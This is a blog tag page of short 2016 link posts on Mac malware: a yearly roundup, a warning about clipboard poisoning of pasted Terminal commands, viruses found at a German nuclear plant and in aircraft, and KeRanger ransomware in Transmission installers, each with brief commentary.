malware

Mac Malware of 2016 →

January 4, 2017 · 19:47

Patrick Wardle:

Due to sheer volume, Windows malware generally dominates the malicious code and news scene. Of course, Macs are susceptible to malware as well and 2016 saw a handful of new malware targeting Apple computers.

In this blog, I wanted to discuss all Mac malware that appeared this year. While each sample has been reported on before (i.e. by the AV company that discovered it), this blog aims to cumulatively cover all in one place. Moreover, for each, we’ll identify the infection vector, persistence mechanism, features/goals, and describe disinfection.

You will also find all the locations of where the malware installs itself.

P.S. I have never been infected in the decade or so as a Mac user.1.

  1. *knock on wood*

How to Avoid Clipboard Poisoning Attacks on the Mac →

June 4, 2016 · 14:56

Thomas Reed:

Graham Cluley drew my attention the other day to an issue that has apparently been known to some for years, but was new to me: clipboard poisoning, an issue where a website can replace what you think is on your clipboard with something else (…)

It turns out that there’s a possibility that this could lead to remote code execution. In other words, it could lead to someone else’s malicious code being run on your computer without your knowledge!

Once malicious code has been run on your computer, that code can download and install other processes, and in no time, your Mac has been pwned.

The key to this issue lies with any code that the user might copy from a website, then copy somewhere else in such a way that it is automatically executed. It turns out that this is possible with shell scripts pasted into the Terminal.

As an example, consider the following command, which is commonly cited as a way to make your Mac show hidden files:

defaults write com.apple.finder AppleShowAllFiles TRUE; killall Finder

Read his full post for tips how to keep yourself safe.

via @qurczaq

Aeroplanes & German Nuclear Plant Infected With Viruses →

April 28, 2016 · 10:11

Christoph Steitz & Eric Auchard:

A nuclear power plant in Germany has been found to be infected with computer viruses, but they appear not to have posed a threat to the facility’s operations because it is isolated from the Internet, the station’s operator said on Tuesday.

Lucky break. Otherwise we’d ‘just’ have a nuclear disaster on our hands.

Mikko Hypponen, chief research officer for Finland-based F-Secure, said that infections of critical infrastructure were surprisingly common, but that they were generally not dangerous unless the plant had been targeted specifically.

I guess we’d find out if a particular plant had been targeted or not after the fact, and after a potential disaster. Seems like a good way to go about security. Right?

As an example, Hypponen said he had recently spoken to a European aircraft maker that said it cleans the cockpits of its planes every week of malware designed for Android phones. The malware spread to the planes only because factory employees were charging their phones with the USB port in the cockpit.

Seriously? How the fuck is this even possible? Fortunately…

Because the plane runs a different operating system, nothing would befall it.

Unless the malware was written to target that OS.

Transmission for OS X Infected With KeRanger Ransomware →

March 7, 2016 · 08:03

Claud Xiao and Jin Chen:

On March 4, we detected that the Transmission BitTorrent ailient installer for OS X was infected with ransomware, just a few hours after installers were initially posted. We have named this Ransomware “KeRanger.” The only previous ransomware for OS X we are aware of is FileCoder, discovered by Kaspersky Lab in 2014. As FileCoder was incomplete at the time of its discovery, we believe KeRanger is the first fully functional ransomware seen on the OS X platform.

Attackers infected two installers of Transmission version 2.90 with KeRanger on the morning of March 4. When we identified the issue, the infected DMG files were still available for downloading from the Transmission site. Transmission is an open source project. It’s possible that Transmission’s official website was compromised and the files were replaced by re-compiled malicious versions, but we can’t confirm how this infection occurred.

You’ll find the malware removal instructions under the title’s link.